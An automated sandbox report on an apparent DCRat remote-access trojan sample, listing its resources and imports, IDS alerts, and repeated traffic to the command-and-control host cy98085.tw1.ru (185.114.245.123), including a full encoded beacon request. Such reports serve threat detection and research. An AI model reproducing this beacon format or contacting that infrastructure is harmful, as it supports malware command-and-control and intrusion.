                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                    PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                    RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                    RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                    RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                    RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                    RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                    RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                    RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                    RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                    RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                    RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                    RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                    RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                    RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                    RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                    RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                    RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                    RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                    RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                    RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                    RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                    RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                    RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                    RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                    RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                    RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                    Imports

                    DLLImport
                    KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                    gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-11-23T02:20:10.246184+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.649723185.114.245.12380TCP
                    2024-11-23T02:20:23.852194+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M41185.114.245.12380192.168.2.649757TCP
                    2024-11-23T02:21:55.896496+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M41185.114.245.12380192.168.2.649987TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 23, 2024 02:20:08.611248016 CET4972380192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:08.730815887 CET8049723185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:08.730906010 CET4972380192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:08.731681108 CET4972380192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:08.851160049 CET8049723185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:10.246021032 CET8049723185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:10.246107101 CET8049723185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:10.246184111 CET4972380192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.741596937 CET4972980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.751043081 CET4973080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.764272928 CET4972380192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.861179113 CET8049729185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:11.861527920 CET4972980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.861928940 CET4972980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.870604038 CET8049730185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:11.871033907 CET4973080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.871232033 CET4973080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.873740911 CET4972980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.873745918 CET4973080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.884012938 CET8049723185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:11.885046005 CET4972380192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.950370073 CET4973180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:11.981445074 CET8049729185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:11.990817070 CET8049730185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:11.990869045 CET8049730185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.036837101 CET8049730185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.036854029 CET8049729185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.070101023 CET8049731185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.070714951 CET4973180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:12.104047060 CET4973180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:12.224217892 CET8049731185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.224647045 CET8049731185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.874298096 CET8049730185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.874366045 CET4973080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:12.901292086 CET8049729185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:12.901397943 CET4972980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:13.439039946 CET8049731185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:13.490376949 CET4973180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:16.960494995 CET4973180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:16.961462975 CET4975780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:17.080252886 CET8049731185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:17.080342054 CET4973180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:17.081015110 CET8049757185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:17.081099033 CET4975780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:17.081677914 CET4975780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:17.201150894 CET8049757185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:17.201251030 CET8049757185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:18.599766016 CET8049757185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:18.646689892 CET4975780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:23.647814989 CET4975780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:23.649060011 CET4977580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:23.852194071 CET8049757185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:23.852232933 CET8049775185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:23.852271080 CET4975780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:23.852338076 CET4977580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:23.853331089 CET4977580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:24.090966940 CET8049775185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:24.091002941 CET8049775185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:25.217832088 CET8049775185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:25.272665024 CET4977580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:30.225713015 CET4977580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:30.226526022 CET4979080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:30.347023010 CET8049790185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:30.347120047 CET4979080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:30.347333908 CET4979080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:30.349720955 CET8049775185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:30.349873066 CET4977580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:30.466829062 CET8049790185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:30.467024088 CET8049790185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:31.825900078 CET8049790185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:31.881086111 CET4979080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:36.834759951 CET4979080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:36.835659981 CET4981280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:36.954664946 CET8049790185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:36.954726934 CET4979080192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:36.955156088 CET8049812185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:36.955235958 CET4981280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:36.955472946 CET4981280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:37.075021029 CET8049812185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:37.075098991 CET8049812185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:38.469568014 CET8049812185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:38.521728039 CET4981280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:43.475502014 CET4981280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:43.476703882 CET4983180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:43.595140934 CET8049812185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:43.595201969 CET4981280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:43.596148968 CET8049831185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:43.596224070 CET4983180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:43.596457005 CET4983180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:43.715913057 CET8049831185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:43.716053009 CET8049831185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:44.961993933 CET8049831185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:45.006113052 CET4983180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:49.975610018 CET4983180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:49.976488113 CET4984780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:50.095287085 CET8049831185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:50.095444918 CET4983180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:50.095891953 CET8049847185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:50.095980883 CET4984780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:50.096213102 CET4984780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:50.215678930 CET8049847185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:50.215821981 CET8049847185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:51.460709095 CET8049847185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:51.506161928 CET4984780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:56.475513935 CET4984780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:56.476293087 CET4986280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:56.595424891 CET8049847185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:56.595508099 CET4984780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:56.595774889 CET8049862185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:56.595839024 CET4986280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:56.596008062 CET4986280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:20:56.715483904 CET8049862185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:56.715606928 CET8049862185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:58.063668966 CET8049862185.114.245.123192.168.2.6
                    Nov 23, 2024 02:20:58.115528107 CET4986280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:03.224458933 CET4986280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:03.227166891 CET4987880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:03.346796989 CET8049878185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:03.346921921 CET4987880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:03.349623919 CET8049862185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:03.349694014 CET4986280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:03.354399920 CET4987880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:03.474014044 CET8049878185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:03.474087000 CET8049878185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:04.826591015 CET8049878185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:04.877517939 CET4987880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:09.835110903 CET4987880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:09.836275101 CET4989580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:09.954895973 CET8049878185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:09.955075026 CET4987880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:09.955777884 CET8049895185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:09.955862045 CET4989580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:09.956015110 CET4989580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:10.075480938 CET8049895185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:10.075643063 CET8049895185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:11.367178917 CET8049895185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:11.412440062 CET4989580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:16.381863117 CET4989580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:16.382786036 CET4991180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:16.501770973 CET8049895185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:16.501857042 CET4989580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:16.502379894 CET8049911185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:16.502451897 CET4991180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:16.502609015 CET4991180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:16.622279882 CET8049911185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:16.622308016 CET8049911185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:17.912933111 CET8049911185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:17.959343910 CET4991180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:22.928857088 CET4991180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:22.929737091 CET4992680192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:23.048733950 CET8049911185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:23.048800945 CET4991180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:23.049137115 CET8049926185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:23.049329996 CET4992680192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:23.049510002 CET4992680192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:23.168966055 CET8049926185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:23.169080973 CET8049926185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:24.407355070 CET8049926185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:24.459352016 CET4992680192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:29.464282990 CET4992680192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:29.465318918 CET4994280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:29.584099054 CET8049926185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:29.584564924 CET4992680192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:29.584693909 CET8049942185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:29.585838079 CET4994280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:29.586147070 CET4994280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:29.705598116 CET8049942185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:29.705707073 CET8049942185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:31.114972115 CET8049942185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:31.162502050 CET4994280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:36.119640112 CET4995580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:36.120285988 CET4994280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:36.239126921 CET8049955185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:36.239192963 CET4995580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:36.239336967 CET4995580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:36.359500885 CET8049955185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:36.359513044 CET8049955185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:37.641001940 CET8049955185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:37.693876028 CET4995580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:42.647672892 CET4995580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:42.649194002 CET4997180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:42.767519951 CET8049955185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:42.767597914 CET4995580192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:42.768824100 CET8049971185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:42.768934965 CET4997180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:42.769056082 CET4997180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:42.888585091 CET8049971185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:42.888796091 CET8049971185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:44.238723993 CET8049971185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:44.287600994 CET4997180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:49.241389990 CET4997180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:49.242655993 CET4998780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:49.361270905 CET8049971185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:49.361392975 CET4997180192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:49.362128973 CET8049987185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:49.362224102 CET4998780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:49.362415075 CET4998780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:49.481909990 CET8049987185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:49.482038021 CET8049987185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:50.766148090 CET8049987185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:50.818808079 CET4998780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:55.776602983 CET4998780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:55.776644945 CET5000280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:55.896173954 CET8050002185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:55.896496058 CET8049987185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:55.896972895 CET4998780192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:55.896994114 CET5000280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:55.897264004 CET5000280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:21:56.016743898 CET8050002185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:56.016854048 CET8050002185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:57.261507034 CET8050002185.114.245.123192.168.2.6
                    Nov 23, 2024 02:21:57.303216934 CET5000280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:02.811764002 CET5000280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:02.847193956 CET5001880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:02.931555986 CET8050002185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:02.931612015 CET5000280192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:02.966650963 CET8050018185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:02.966722965 CET5001880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:02.985508919 CET5001880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:03.105034113 CET8050018185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:03.105127096 CET8050018185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:04.465822935 CET8050018185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:04.584731102 CET5001880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:11.257353067 CET5001880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:11.263879061 CET5002980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:11.377334118 CET8050018185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:11.377391100 CET5001880192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:11.383322001 CET8050029185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:11.383389950 CET5002980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:11.383502960 CET5002980192.168.2.6185.114.245.123
                    Nov 23, 2024 02:22:11.502975941 CET8050029185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:11.503086090 CET8050029185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:12.795928001 CET8050029185.114.245.123192.168.2.6
                    Nov 23, 2024 02:22:12.850131989 CET5002980192.168.2.6185.114.245.123

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 23, 2024 02:20:07.828818083 CET5241753192.168.2.61.1.1.1
                    Nov 23, 2024 02:20:08.554492950 CET53524171.1.1.1192.168.2.6

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Nov 23, 2024 02:20:07.828818083 CET192.168.2.61.1.1.10xd75aStandard query (0)cy98085.tw1.ruA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Nov 23, 2024 02:20:08.554492950 CET1.1.1.1192.168.2.60xd75aNo error (0)cy98085.tw1.ru185.114.245.123A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • cy98085.tw1.ru

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649723185.114.245.123807248C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    TimestampBytes transferredDirectionData
                    Nov 23, 2024 02:20:08.731681108 CET590OUTGET /d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM HTTP/1.1
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:20:10.246021032 CET1236INHTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:20:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 2160
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    Data Raw: 3d 3d 51 66 69 45 57 4d 6d 4e 6d 4d 6d 42 6a 59 7a 55 6d 5a 6c 5a 6a 4e 34 49 6a 4d 79 41 54 5a 6a 4e 54 4e 6d 46 57 4d 34 51 57 4e 31 55 47 4e 69 6f 6a 49 34 67 54 59 30 55 57 4f 79 55 47 5a 32 63 44 4e 30 4d 54 4e 78 51 57 4f 69 4e 6d 59 6c 68 54 4f 32 59 6a 59 35 55 47 4e 31 45 6a 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED]
